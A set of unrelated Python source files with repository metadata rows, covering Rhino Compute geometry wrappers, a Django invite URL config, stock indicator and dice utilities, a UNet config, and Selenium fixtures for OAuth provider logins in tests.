response = Util.ComputeFetch("rhino/geometry/brep/createfromtaperedextrude-curve_double_vector3d_point3d_double_extrudecornertype_double_double", args)
return response
def CreateFromTaperedExtrude1(curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType):
args = [curveToExtrude, distance, direction, basePoint, draftAngleRadians, cornerType]
response = Util.ComputeFetch("rhino/geometry/brep/createfromtaperedextrude-curve_double_vector3d_point3d_double_extrudecornertype", args)
return response
def CreateBlendSurface(face0, edge0, domain0, rev0, continuity0, face1, edge1, domain1, rev1, continuity1):
args = [face0, edge0, domain0, rev0, continuity0, face1, edge1, domain1, rev1, continuity1]
response = Util.ComputeFetch("rhino/geometry/brep/createblendsurface-brepface_brepedge_interval_bool_blendcontinuity_brepface_brepedge_interval_bool_blendcontinuity", args)
return response
def CreateBlendShape(face0, edge0, t0, rev0, continuity0, face1, edge1, t1, rev1, continuity1):
args = [face0, edge0, t0, rev0, continuity0, face1, edge1, t1, rev1, continuity1]
response = Util.ComputeFetch("rhino/geometry/brep/createblendshape-brepface_brepedge_double_bool_blendcontinuity_brepface_brepedge_double_bool_blendcontinuity", args)
return response
def CreateFilletSurface(face0, uv0, face1, uv1, radius, extend, tolerance):
args = [face0, uv0, face1, uv1, radius, extend, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfilletsurface-brepface_point2d_brepface_point2d_double_bool_double", args)
return response
def CreateChamferSurface(face0, uv0, radius0, face1, uv1, radius1, extend, tolerance):
args = [face0, uv0, radius0, face1, uv1, radius1, extend, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createchamfersurface-brepface_point2d_double_brepface_point2d_double_bool_double", args)
return response
def CreateFilletEdges(brep, edgeIndices, startRadii, endRadii, blendType, railType, tolerance):
args = [brep, edgeIndices, startRadii, endRadii, blendType, railType, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfilletedges-brep_intarray_doublearray_doublearray_blendtype_railtype_double", args)
return response
def CreateFromJoinedEdges(brep0, edgeIndex0, brep1, edgeIndex1, joinTolerance):
args = [brep0, edgeIndex0, brep1, edgeIndex1, joinTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromjoinededges-brep_int_brep_int_double", args)
return response
def CreateFromLoft(curves, start, end, loftType, closed):
args = [curves, start, end, loftType, closed]
response = Util.ComputeFetch("rhino/geometry/brep/createfromloft-curvearray_point3d_point3d_lofttype_bool", args)
return response
def CreateFromLoftRebuild(curves, start, end, loftType, closed, rebuildPointCount):
args = [curves, start, end, loftType, closed, rebuildPointCount]
response = Util.ComputeFetch("rhino/geometry/brep/createfromloftrebuild-curvearray_point3d_point3d_lofttype_bool_int", args)
return response
def CreateFromLoftRefit(curves, start, end, loftType, closed, refitTolerance):
args = [curves, start, end, loftType, closed, refitTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createfromloftrefit-curvearray_point3d_point3d_lofttype_bool_double", args)
return response
def CreateBooleanUnion(breps, tolerance):
args = [breps, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanunion-breparray_double", args)
return response
def CreateBooleanUnion1(breps, tolerance, manifoldOnly):
args = [breps, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanunion-breparray_double_bool", args)
return response
def CreateBooleanIntersection(firstSet, secondSet, tolerance):
args = [firstSet, secondSet, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-breparray_breparray_double", args)
return response
def CreateBooleanIntersection1(firstSet, secondSet, tolerance, manifoldOnly):
args = [firstSet, secondSet, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-breparray_breparray_double_bool", args)
return response
def CreateBooleanIntersection2(firstBrep, secondBrep, tolerance):
args = [firstBrep, secondBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-brep_brep_double", args)
return response
def CreateBooleanIntersection3(firstBrep, secondBrep, tolerance, manifoldOnly):
args = [firstBrep, secondBrep, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleanintersection-brep_brep_double_bool", args)
return response
def CreateBooleanDifference(firstSet, secondSet, tolerance):
args = [firstSet, secondSet, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-breparray_breparray_double", args)
return response
def CreateBooleanDifference1(firstSet, secondSet, tolerance, manifoldOnly):
args = [firstSet, secondSet, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-breparray_breparray_double_bool", args)
return response
def CreateBooleanDifference2(firstBrep, secondBrep, tolerance):
args = [firstBrep, secondBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-brep_brep_double", args)
return response
def CreateBooleanDifference3(firstBrep, secondBrep, tolerance, manifoldOnly):
args = [firstBrep, secondBrep, tolerance, manifoldOnly]
response = Util.ComputeFetch("rhino/geometry/brep/createbooleandifference-brep_brep_double_bool", args)
return response
def CreateShell(brep, facesToRemove, distance, tolerance):
args = [brep, facesToRemove, distance, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createshell-brep_intarray_double_double", args)
return response
def JoinBreps(brepsToJoin, tolerance):
args = [brepsToJoin, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/joinbreps-breparray_double", args)
return response
def MergeBreps(brepsToMerge, tolerance):
args = [brepsToMerge, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/mergebreps-breparray_double", args)
return response
def CreateContourCurves(brepToContour, contourStart, contourEnd, interval):
args = [brepToContour, contourStart, contourEnd, interval]
response = Util.ComputeFetch("rhino/geometry/brep/createcontourcurves-brep_point3d_point3d_double", args)
return response
def CreateContourCurves1(brepToContour, sectionPlane):
args = [brepToContour, sectionPlane]
response = Util.ComputeFetch("rhino/geometry/brep/createcontourcurves-brep_plane", args)
return response
def CreateCurvatureAnalysisMesh(brep, state):
args = [brep, state]
response = Util.ComputeFetch("rhino/geometry/brep/createcurvatureanalysismesh-brep_rhino.applicationsettings.curvatureanalysissettingsstate", args)
return response
def GetRegions(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/getregions-brep", args)
return response
def GetWireframe(thisBrep, density):
args = [thisBrep, density]
response = Util.ComputeFetch("rhino/geometry/brep/getwireframe-brep_int", args)
return response
def ClosestPoint(thisBrep, testPoint):
args = [thisBrep, testPoint]
response = Util.ComputeFetch("rhino/geometry/brep/closestpoint-brep_point3d", args)
return response
def IsPointInside(thisBrep, point, tolerance, strictlyIn):
args = [thisBrep, point, tolerance, strictlyIn]
response = Util.ComputeFetch("rhino/geometry/brep/ispointinside-brep_point3d_double_bool", args)
return response
def CapPlanarHoles(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/capplanarholes-brep_double", args)
return response
def Join(thisBrep, otherBrep, tolerance, compact):
args = [thisBrep, otherBrep, tolerance, compact]
response = Util.ComputeFetch("rhino/geometry/brep/join-brep_brep_double_bool", args)
return response
def JoinNakedEdges(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/joinnakededges-brep_double", args)
return response
def MergeCoplanarFaces(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/mergecoplanarfaces-brep_double", args)
return response
def MergeCoplanarFaces1(thisBrep, tolerance, angleTolerance):
args = [thisBrep, tolerance, angleTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/mergecoplanarfaces-brep_double_double", args)
return response
def Split(thisBrep, splitter, intersectionTolerance):
args = [thisBrep, splitter, intersectionTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/split-brep_brep_double", args)
return response
def Split1(thisBrep, splitter, intersectionTolerance, toleranceWasRaised):
args = [thisBrep, splitter, intersectionTolerance, toleranceWasRaised]
response = Util.ComputeFetch("rhino/geometry/brep/split-brep_brep_double_bool", args)
return response
def Trim(thisBrep, cutter, intersectionTolerance):
args = [thisBrep, cutter, intersectionTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/trim-brep_brep_double", args)
return response
def Trim1(thisBrep, cutter, intersectionTolerance):
args = [thisBrep, cutter, intersectionTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/trim-brep_plane_double", args)
return response
def UnjoinEdges(thisBrep, edgesToUnjoin):
args = [thisBrep, edgesToUnjoin]
response = Util.ComputeFetch("rhino/geometry/brep/unjoinedges-brep_intarray", args)
return response
def JoinEdges(thisBrep, edgeIndex0, edgeIndex1, joinTolerance, compact):
args = [thisBrep, edgeIndex0, edgeIndex1, joinTolerance, compact]
response = Util.ComputeFetch("rhino/geometry/brep/joinedges-brep_int_int_double_bool", args)
return response
def TransformComponent(thisBrep, components, xform, tolerance, timeLimit, useMultipleThreads):
args = [thisBrep, components, xform, tolerance, timeLimit, useMultipleThreads]
response = Util.ComputeFetch("rhino/geometry/brep/transformcomponent-brep_componentindexarray_transform_double_double_bool", args)
return response
def GetArea(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/getarea-brep", args)
return response
def GetArea1(thisBrep, relativeTolerance, absoluteTolerance):
args = [thisBrep, relativeTolerance, absoluteTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/getarea-brep_double_double", args)
return response
def GetVolume(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/getvolume-brep", args)
return response
def GetVolume1(thisBrep, relativeTolerance, absoluteTolerance):
args = [thisBrep, relativeTolerance, absoluteTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/getvolume-brep_double_double", args)
return response
def RebuildTrimsForV2(thisBrep, face, nurbsSurface):
args = [thisBrep, face, nurbsSurface]
response = Util.ComputeFetch("rhino/geometry/brep/rebuildtrimsforv2-brep_brepface_nurbssurface", args)
return response
def MakeValidForV2(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/makevalidforv2-brep", args)
return response
def Repair(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/repair-brep_double", args)
return response
def RemoveHoles(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/removeholes-brep_double", args)
return response
def RemoveHoles1(thisBrep, loops, tolerance):
args = [thisBrep, loops, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/removeholes-brep_componentindexarray_double", args)
return response
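Every wrapper above follows the same shape: pack the arguments into a list and pass them, with an endpoint string that encodes the method and its parameter types, to `Util.ComputeFetch`. A self-contained sketch of that dispatch pattern, with a stub in place of `Util.ComputeFetch` (the stub records the call instead of POSTing to a Rhino Compute server):

```python
def compute_fetch(endpoint, args):
    # Stand-in for Util.ComputeFetch: a real client would POST `args` as JSON
    # to the compute server at `endpoint` and return the decoded response.
    return {'endpoint': endpoint, 'args': args}

def create_solid(breps, tolerance):
    # Same three-line wrapper shape as the generated functions above.
    args = [breps, tolerance]
    return compute_fetch("rhino/geometry/brep/createsolid-breparray_double", args)

resp = create_solid(['brepA', 'brepB'], 0.01)
print(resp['endpoint'])  # rhino/geometry/brep/createsolid-breparray_double
```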
| 40.644711 | 176 | 0.782449 | 2,038 | 20,363 | 7.70265 | 0.119725 | 0.063448 | 0.126895 | 0.153332 | 0.746656 | 0.67499 | 0.562365 | 0.474455 | 0.379157 | 0.31297 | 0 | 0.010664 | 0.125031 | 20,363 | 500 | 177 | 40.726 | 0.870405 | 0 | 0 | 0.348348 | 0 | 0 | 0.264316 | 0.264316 | 0 | 0 | 0 | 0 | 0 | 1 | 0.249249 | false | 0 | 0.003003 | 0 | 0.501502 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e4bfcf3942358a807f95445f45c826ed6e46a32 | 361 | py | Python | drf_simple_invite/urls.py | mattyg/drf-simple-invite | 7d2b9a512f5e02cc0b492c79689531e2ad67a243 | [
"BSD-3-Clause"
] | 6 | 2019-08-09T06:37:47.000Z | 2022-01-06T08:36:55.000Z | drf_simple_invite/urls.py | thapabishwa/drf_simple_invite | 154d144b45585b748739322c22ef42ac3899646a | [
"BSD-3-Clause"
] | 12 | 2019-07-03T21:12:12.000Z | 2021-06-25T15:24:13.000Z | drf_simple_invite/urls.py | thapabishwa/drf_simple_invite | 154d144b45585b748739322c22ef42ac3899646a | [
"BSD-3-Clause"
] | 3 | 2020-02-07T22:51:52.000Z | 2021-12-17T06:02:46.000Z | from django.conf.urls import url
from rest_framework import routers
from drf_simple_invite.views import SetUserPasswordView, InviteUserView
router = routers.DefaultRouter()
app_name = 'drf_simple_invite'
urlpatterns = [
    url(r'^confirm', SetUserPasswordView.as_view(), name='confirm-user'),
    url(r'^', InviteUserView.as_view(), name='invite-user'),
]
| 25.785714 | 73 | 0.764543 | 45 | 361 | 5.955556 | 0.555556 | 0.067164 | 0.11194 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113573 | 361 | 13 | 74 | 27.769231 | 0.8375 | 0 | 0 | 0 | 0 | 0 | 0.135734 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.222222 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
1e667ba1e94f3ec1ee3b00e6ac770ad762185aac | 3,342 | py | Python | unit_test.py | danielgriggs/console80 | 7050647a0a6f0fcaa31046a3623c96185e183f96 | [
"MIT"
] | null | null | null | unit_test.py | danielgriggs/console80 | 7050647a0a6f0fcaa31046a3623c96185e183f96 | [
"MIT"
] | null | null | null | unit_test.py | danielgriggs/console80 | 7050647a0a6f0fcaa31046a3623c96185e183f96 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import console80v2
singleton = console80v2.singleIntValue()
print "=== Singleton Time ==="
print ""
print singleton
print ""
print "Set a max number of items in history"
singleton.setMaxHistoryLength(4)
print singleton
print ""
print "Add 0 through 7 to history"
for i in range(1,8):
    singleton.updateValue(i)
print singleton
print "Increase the history length"
singleton.setMaxHistoryLength(5)
print "Add 1 through 19 to history"
for i in range(1,20):
    singleton.updateValue(i)
print singleton
print ""
print "History statistics"
print "Avg: {}".format(singleton.getHistoryAvg())
print "Max: {}".format(singleton.getHistoryMax())
print "Min: {}".format(singleton.getHistoryMin())
print "Last 1: {}".format(singleton.getHistoryLast())
print "Last 3: {}".format(singleton.getHistoryLast(3))
print ""
print "Get current Value"
print "Current: {}".format(singleton.getValue())
print "Scaled: {}".format(singleton.getScaledValue())
print ""
print "Add values outside the range"
singleton.updateValue(101)
print "Get the value back {}".format(singleton.getValue())
print "Get a scaled value back {}".format(singleton.getScaledValue())
print "Am I clipping {}".format(singleton.isClipped())
print ""
singleton.updateValue(-1)
print "Get the value back {}".format(singleton.getValue())
print "Get a scaled value back {}".format(singleton.getScaledValue())
print "Am I clipping {}".format(singleton.isClipped())
print ""
singleton.updateValue(5)
print singleton
print "Get the value back {}".format(singleton.getValue())
print "Am I clipping {}".format(singleton.isClipped())
print ""
print "Set the range 1 - 10"
singleton.setRange((0,10))
print singleton
print ""
print "Sweep to 10 and back"
for i in range(22):
    singleton.sweepValue()
print singleton
print ""
print ""
coord = console80v2.singleCoordValue()
print "=== Co-Ordinates Time ==="
print ""
print coord
print ""
print "Set a max number of items in history to 4"
coord.setMaxHistoryLength(4)
print coord
print ""
print "Add 0 through 7 to history"
for i in range(1,8):
    coord.updateValue((i**2,i**2))
print coord
print ""
print "Set a max number of items in history to 5"
coord.setMaxHistoryLength(5)
print coord
print ""
print "Add 1 through 19 to history"
for i in range(4,8):
    coord.updateValue((i**2,i**2))
print coord
print ""
print "History statistics"
print "Avg: {}".format(coord.getHistoryAvg())
print "Max: {}".format(coord.getHistoryMax())
print "Min: {}".format(coord.getHistoryMin())
print "Last 1: {}".format(coord.getHistoryLast())
print "Last 3: {}".format(coord.getHistoryLast(3))
print ""
print "Get current Value"
print "Current: {}".format(coord.getValue())
print ""
print "Add values outside the range"
coord.updateValue((101,101))
print "Get the value back {}".format(coord.getValue())
print "Am I clipping {}".format(coord.isClipped())
print ""
coord.updateValue((-1,-1))
print "Get the value back {}".format(coord.getValue())
print "Am I clipping {}".format(coord.isClipped())
print ""
coord.updateValue((0,0))
print "Get the value back {}".format(coord.getValue())
print "Am I clipping {}".format(coord.isClipped())
print ""
print "Set the range -5,-5 - 5,5"
coord.setRange(((-5 , -5) , (5 , 5)))
print coord
print ""
print "Sweep to 5 and back to -5"
for i in range(22):
    coord.sweepValue()
print coord
print ""
| 27.85 | 69 | 0.717235 | 467 | 3,342 | 5.132762 | 0.149893 | 0.079266 | 0.050063 | 0.027534 | 0.67209 | 0.592407 | 0.547768 | 0.485607 | 0.468919 | 0.448894 | 0 | 0.027749 | 0.126571 | 3,342 | 119 | 70 | 28.084034 | 0.793422 | 0.004788 | 0 | 0.628319 | 0 | 0 | 0.271523 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.00885 | null | null | 0.761062 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
1e7e6a73854ea7cfa7b06c8d60fbaad94a3a05c7 | 2,588 | py | Python | stock_indicators/indicators/kama.py | LeeDongGeon1996/Stock.Indicators.Python | b706d00279a8ab5f2794417ddef1bf45e1c48587 | [
"Apache-2.0"
] | 13 | 2021-11-09T13:16:31.000Z | 2022-03-28T00:30:30.000Z | stock_indicators/indicators/kama.py | LeeDongGeon1996/Stock.Indicators.Python | b706d00279a8ab5f2794417ddef1bf45e1c48587 | [
"Apache-2.0"
] | 162 | 2021-11-03T15:57:17.000Z | 2022-03-30T15:32:20.000Z | stock_indicators/indicators/kama.py | LeeDongGeon1996/Stock.Indicators.Python | b706d00279a8ab5f2794417ddef1bf45e1c48587 | [
"Apache-2.0"
] | 5 | 2021-11-04T13:35:05.000Z | 2022-01-06T10:27:38.000Z | from decimal import Decimal
from typing import Iterable, Optional, TypeVar
from stock_indicators._cslib import CsIndicator
from stock_indicators._cstypes import List as CsList
from stock_indicators._cstypes import Decimal as CsDecimal
from stock_indicators._cstypes import to_pydecimal
from stock_indicators.indicators.common.helpers import RemoveWarmupMixin
from stock_indicators.indicators.common.results import IndicatorResults, ResultBase
from stock_indicators.indicators.common.quote import Quote
def get_kama(quotes: Iterable[Quote], er_periods: int = 10,
fast_periods: int = 2, slow_periods: int = 30):
"""Get KAMA calculated.
Kaufman’s Adaptive Moving Average (KAMA) is an volatility
adaptive moving average of Close price over configurable lookback periods.
Parameters:
`quotes` : Iterable[Quote]
Historical price quotes.
`er_periods` : int, defaults 10
Number of Efficiency Ratio (volatility) periods.
`fast_periods` : int, defaults 2
Number of periods in the Fast EMA.
`slow_periods` : int, defaults 30
Number of periods in the Slow EMA.
Returns:
`KAMAResults[KAMAResult]`
KAMAResults is list of KAMAResult with providing useful helper methods.
See more:
- [KAMA Reference](https://daveskender.github.io/Stock.Indicators.Python/indicators/Kama/#content)
- [Helper Methods](https://daveskender.github.io/Stock.Indicators.Python/utilities/#content)
"""
results = CsIndicator.GetKama[Quote](CsList(Quote, quotes), er_periods,
fast_periods, slow_periods)
return KAMAResults(results, KAMAResult)
class KAMAResult(ResultBase):
"""
A wrapper class for a single unit of Kaufman’s Adaptive Moving Average (KAMA) results.
"""
@property
def efficiency_ratio(self) -> Optional[float]:
return self._csdata.ER
@efficiency_ratio.setter
def efficiency_ratio(self, value):
self._csdata.ER = value
@property
def kama(self) -> Optional[Decimal]:
return to_pydecimal(self._csdata.Kama)
@kama.setter
def kama(self, value):
self._csdata.Kama = CsDecimal(value)
_T = TypeVar("_T", bound=KAMAResult)
class KAMAResults(RemoveWarmupMixin, IndicatorResults[_T]):
"""
A wrapper class for the list of Kaufman’s Adaptive Moving Average (KAMA) results.
    It is exactly the same as the built-in `list`, except that it provides
    some useful helper methods from the C# implementation.
"""
| 34.506667 | 107 | 0.704405 | 310 | 2,588 | 5.774194 | 0.341935 | 0.075419 | 0.074302 | 0.043575 | 0.250279 | 0.115642 | 0.097207 | 0.046927 | 0 | 0 | 0 | 0.004936 | 0.217156 | 2,588 | 74 | 108 | 34.972973 | 0.878578 | 0.43238 | 0 | 0.068966 | 0 | 0 | 0.001479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.310345 | 0.068966 | 0.655172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
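The `get_kama` wrapper above delegates the arithmetic to the C# library, so the recurrence itself never appears in the file. As a rough illustration only, here is a pure-Python sketch of the standard KAMA recurrence the docstring describes (the `kama` helper is hypothetical and not part of `stock_indicators`):

```python
def kama(prices, er_periods=10, fast_periods=2, slow_periods=30):
    """Hypothetical pure-Python KAMA, seeded with the first price."""
    fast_sc = 2 / (fast_periods + 1)
    slow_sc = 2 / (slow_periods + 1)
    out = [prices[0]]
    for i in range(1, len(prices)):
        start = max(0, i - er_periods)
        change = abs(prices[i] - prices[start])
        volatility = sum(abs(prices[j] - prices[j - 1])
                         for j in range(start + 1, i + 1))
        er = change / volatility if volatility else 0.0  # Efficiency Ratio
        sc = (er * (fast_sc - slow_sc) + slow_sc) ** 2   # smoothing constant
        out.append(out[-1] + sc * (prices[i] - out[-1]))
    return out
```

Note how `er` drives the smoothing constant between the fast and slow EMA factors: trending prices push `er` toward 1 (fast tracking), choppy prices push it toward 0 (heavy smoothing).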
1e8f5c3afab5efd85940a5be757ce5169c8a9811 | 256 | py | Python | dice.py | Jmainguy/pyHackpySlash | 4f54cbb1ac8bb7dbc33301be81f2bd0625f0ff4d | [
"BSD-3-Clause"
] | 1 | 2021-06-12T14:54:28.000Z | 2021-06-12T14:54:28.000Z | dice.py | Jmainguy/pyHackpySlash | 4f54cbb1ac8bb7dbc33301be81f2bd0625f0ff4d | [
"BSD-3-Clause"
] | null | null | null | dice.py | Jmainguy/pyHackpySlash | 4f54cbb1ac8bb7dbc33301be81f2bd0625f0ff4d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import random
def attackroll():
attackdice = 1
attackdicesides = 20
RANDOM = random.randint(1, attackdicesides)
return RANDOM
def damageroll():
damagedice = 1
damagesides = 6
RANDOM = random.randint(1, damagesides)
return RANDOM
| 18.285714 | 44 | 0.746094 | 31 | 256 | 6.16129 | 0.548387 | 0.094241 | 0.198953 | 0.209424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032407 | 0.15625 | 256 | 13 | 45 | 19.692308 | 0.851852 | 0.0625 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
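Both roll functions route through `random.randint`, so they can be sanity-checked deterministically by seeding the generator. A self-contained sketch (the `sides` parameter is my addition; the original functions hard-code their die sizes):

```python
import random

def attackroll(sides=20):
    """Roll one attack die (d20 by default)."""
    return random.randint(1, sides)

def damageroll(sides=6):
    """Roll one damage die (d6 by default)."""
    return random.randint(1, sides)

random.seed(42)           # fixed seed makes the rolls reproducible in tests
print(attackroll(), damageroll())
```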
1e93cfdd86dac61d03e0a272ee87d222f410532d | 326 | py | Python | direct/nn/unet/config.py | iamRyanChia/direct | c3c5e828c22c07e712cb2a4995c47f68a958f13d | [
"Apache-2.0"
] | null | null | null | direct/nn/unet/config.py | iamRyanChia/direct | c3c5e828c22c07e712cb2a4995c47f68a958f13d | [
"Apache-2.0"
] | null | null | null | direct/nn/unet/config.py | iamRyanChia/direct | c3c5e828c22c07e712cb2a4995c47f68a958f13d | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright (c) DIRECT Contributors
from dataclasses import dataclass
from direct.config.defaults import ModelConfig
@dataclass
class UnetModel2dConfig(ModelConfig):
in_channels: int = 2
out_channels: int = 2
num_filters: int = 16
num_pool_layers: int = 4
dropout_probability: float = 0.0
| 23.285714 | 46 | 0.745399 | 43 | 326 | 5.511628 | 0.72093 | 0.092827 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033835 | 0.184049 | 326 | 13 | 47 | 25.076923 | 0.857143 | 0.141104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e963214fc924e438ac7c695dbee017b09a94b67 | 3,490 | py | Python | tests/functional_tests/fixtures/providers.py | chdb/authomatic | 5f02338a9ebc3329fd12f6c67b7047acea4709dc | [
"MIT"
] | null | null | null | tests/functional_tests/fixtures/providers.py | chdb/authomatic | 5f02338a9ebc3329fd12f6c67b7047acea4709dc | [
"MIT"
] | null | null | null | tests/functional_tests/fixtures/providers.py | chdb/authomatic | 5f02338a9ebc3329fd12f6c67b7047acea4709dc | [
"MIT"
] | null | null | null | # encoding: utf-8
import abc
from selenium.webdriver.common.keys import Keys
class BaseProviderFixture(object):
"""
Base class for provider fixtures.
Provides mechanisms of logging the user in by a provider and consenting
to grant access to the tested application.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, login, password):
"""
:param str login:
User login
:param str password:
User password
"""
self.login = login
self.password = password
PRE_LOGIN_CLICKS_XPATH = []
@abc.abstractproperty
def LOGIN_XPATH(self):
pass
@abc.abstractproperty
def PASSWORD_XPATH(self):
pass
@abc.abstractproperty
def CONSENT_XPATHS(self):
pass
@property
def login_function(self):
"""
Fills out and submits provider a login form.
:param str login_xpath:
The XPath of the input element where the user should enter his username.
:param str password_xpath:
The XPath of the input element where the user should enter his password.
:param str login:
The user's username.
:param str password:
The user's password.
"""
def f(browser):
for xpath in self.PRE_LOGIN_CLICKS_XPATH:
print('clicking on {0}'.format(xpath))
browser.find_element_by_xpath(xpath).click()
print('logging the user in.')
browser.find_element_by_xpath(self.LOGIN_XPATH)\
.send_keys(self.login)
password_element = browser.\
find_element_by_xpath(self.PASSWORD_XPATH)
            print('PASSWORD = {0}'.format(self.password))
password_element.send_keys(self.password)
password_element.send_keys(Keys.ENTER)
return f
@property
def consent_function(self):
"""
Clicks a consent button specified by the XPath if it exists recursively.
:param str xpath:
The XPath of the consent button.
"""
def f(browser):
for path in self.CONSENT_XPATHS:
try:
button = browser.find_element_by_xpath(path)
print('Hitting consent button.')
button.click()
f(browser)
                except Exception:
                    print('No consent needed.')
return f
class BitlyFixture(BaseProviderFixture):
PRE_LOGIN_CLICKS_XPATH = ['//*[@id="oauth_access"]/form/div/div[1]/a']
LOGIN_XPATH = '//*[@id="username"]'
PASSWORD_XPATH = '//*[@id="password"]'
CONSENT_XPATHS = ['//*[@id="oauth_access"]/form/button[1]']
class DeviantART(BaseProviderFixture):
LOGIN_XPATH = '//*[@id="username"]'
PASSWORD_XPATH = '//*[@id="password"]'
CONSENT_XPATHS = [
'//*[@id="terms_agree"]',
'//*[@id="authorize_form"]/fieldset/div[2]/div[2]/a[1]',
]
class FacebookFixture(BaseProviderFixture):
LOGIN_XPATH = '//*[@id="email"]'
PASSWORD_XPATH = '//*[@id="pass"]'
CONSENT_XPATHS = [
'//*[@id="platformDialogForm"]/div[2]/div/table/tbody/tr/td[2]/'
'button[1]',
]
class GoogleFixture(BaseProviderFixture):
LOGIN_XPATH = '//*[@id="Email"]'
PASSWORD_XPATH = '//*[@id="Passwd"]'
CONSENT_XPATHS = [
'//*[@id="submit_approve_access"]',
]
